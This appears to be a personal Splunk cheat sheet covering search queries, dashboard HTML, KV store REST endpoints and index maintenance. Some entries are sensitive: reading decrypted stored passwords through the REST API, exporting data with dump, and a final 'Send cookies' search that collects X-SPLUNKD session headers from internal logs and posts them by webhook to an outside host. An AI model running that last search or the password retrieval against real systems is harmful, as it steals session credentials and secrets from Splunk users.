URI Path for web application
If you want to look at the information associated with a specific uri path for a web application:
sitetolookat.com sourcetype=<the sourcetype you have for web stuff> url="/uri/path/file.php*"
Add image to dashboard
<dashboard>
<row>
<html>
<h1>HTML Panel Example</h1>
<p>The HTML panel displays inline HTML.</p>
<img src="picture.jpg"/>
</html>
</row>
</dashboard>
Resource: https://answers.splunk.com/answers/136162/add-picture-to-dashboard.html
View internal splunk logs
index=_internal source="*.log"
Resource: https://answers.splunk.com/answers/575570/where-can-i-find-the-internal-logs-in-the-splunk-5.html
tail -f functionality
After running a query, be sure to change the presets for real-time to a window, such as a 5 minute window to show all events that match the input criteria in the past 5 minutes.
View entry for specific log file
This particular one will show all events for the splunk web service.
source="/opt/splunk/var/log/splunk/web_service.log"
Show decrypted passwords for an app
Navigate to https://127.0.0.1:8089/servicesNS/nobody/<app name>/storage/passwords
Note that you need to have the list_storage_passwords
capability assigned to the user that would access these.
To see what capabilities are associated with a given user, navigate to
https://127.0.0.1:8000/en-US/manager/<app name>/auth/view_capabilities?roles=<username>
KVStore
Show collections for an app
Navigate to https://127.0.0.1:8089/servicesNS/nobody/<app name>/storage/collections/config
Resource: https://docs.splunk.com/Documentation/Splunk/8.0.1/RESTREF/RESTkvstore
Access data in a collection for an app
Navigate to https://localhost:8089/servicesNS/nobody/<app name>/storage/collections/data/<collection>
Resource: https://dev.splunk.com/enterprise/docs/developapps/kvstore/usetherestapitomanagekv/
Check status of the service
Navigate to https://<splunk instance ip or hostname>:8089/services/kvstore/status
Resource: https://docs.splunk.com/Documentation/Splunk/7.2.6/Admin/TroubleshootKVstore
Delete a data in a collection by id
DELETE /servicesNS/nobody/<app name>/storage/collections/data/<collection>/<_key listed>
Resource: https://dev.splunk.com/enterprise/docs/developapps/kvstore/usetherestapitomanagekv/
Write/read to/from a csv file
This particular query will create a file, current_user.csv
,
with the current user’s username:
| rest /services/authentication/current-context/context | table username | outputcsv current_user.csv
The csv file can be found in:
<splunk install loc>/var/run/splunk/csv/current_user.csv
This will read the contents of that file:
|inputcsv current_user.csv
Via GET request:
https://<splunk instance ip or hostname>:8000/en-US/splunkd/__raw/services/search/jobs/oneshot?output_mode=json&search=|%20rest%20/services/authentication/current-context/context%20|%20table%20username%20|%20outputcsv%20foo
Get list of indexes
| eventcount summarize=false index=* | dedup index | fields index
Alternatively:
| dbinspect index=*
Resource: https://answers.splunk.com/answers/39370/is-it-possibl-to-get-a-list-of-available-indices.html
Clear data from an index
Stop the splunk process:
splunk stop
Clear data from a specific index:
splunk clean eventdata -index <index name>
Restart splunk:
splunk start
Resource: https://answers.splunk.com/answers/46401/how-to-delete-old-date-from-splunk.html
Dump example
This is a risky
command will export search results to a set
of chunk files on the local disk in the form of basefilename_number_anothernumber.raw.gz
.
| history | dump basefilename=ExportedFilesSoExciting
To find the files on disk, use this command:
find . -iname "*raw.gz"
Resources:
- https://docs.splunk.com/Documentation/Splunk/8.0.1/SearchReference/Dump
- https://docs.splunk.com/Documentation/Splunk/8.0.1/Security/SPLsafeguards
Official Quick Reference Guide
This guide lays out the fundamentals needed to use Splunk effectively.
Send webhook
| sendalert webhook param.url=https://google.com/bla.js
Send cookies
index=_internal source=*web_service.log X-SPLUNKD: | sendalert webhook param.url=http://yoursite.com